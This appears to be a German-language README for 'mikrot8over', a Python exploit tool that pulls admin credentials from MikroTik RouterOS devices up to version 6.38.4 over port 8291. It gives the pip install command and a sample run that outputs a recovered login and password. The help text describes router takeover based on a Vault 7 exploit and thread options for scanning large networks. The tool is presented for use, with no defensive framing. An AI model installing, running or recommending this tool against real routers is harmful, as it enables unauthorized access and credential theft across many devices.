
mikrot8over: Schnelles Exploitation-Tool für Mikrotik RouterOS bis Version 6.38.4
mikrot8over: Schnelles Exploitationstool für Mikrotik RouterOS bis Version 6.38.4
Dies ist die überarbeitete Originalversion des Mikrotik Exploit. Es wurden Python 2 Kompatibilität und Multithreading-Scan-Funktionen hinzugefügt.
Das Tool wurde auf python2.6, python2.7, python3.* getestet. Falls Sie Fehler finden, zögern Sie nicht, ein Issue zu eröffnen.
pip install mikrot8over
# pip install mikrot8over
# mikrot8over 127.0.0.1
Starting scan for IP 127.0.0.1, port 8291 running in 10 threads
100%|███████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 1/1 [00:00<00:00, 3379.78it/s]
+----------------------+--------------------------------+------------------------------------------------------------------------------------------------------+
| IP | Login | Password |
+======================+================================+======================================================================================================+
127.0.0.1 admin admin
+----------------------+--------------------------------+------------------------------------------------------------------------------------------------------+
Sie können die maximale Anzahl von Threads und das Socket-Timeout für das Scannen großer Netzwerke festlegen.
# pip install mikrot8over
# mikrot8over --help
Usage:
Mikrotik exploit from Vault 7 CIA Leaks automation tool
Takeovers up to RouterOS 6.38.4.
Usage: mikrot8over IP_ADDRESS
Options:
-h, --help show this help message and exit
-p PORT, --port=PORT List of the port to scan. Default is 8291
-t THREADS, --threads=THREADS
Number of scan threads. Default is 10 that fits the
most of systems
-o TIMEOUT, --timeout=TIMEOUT
Socket connection timeout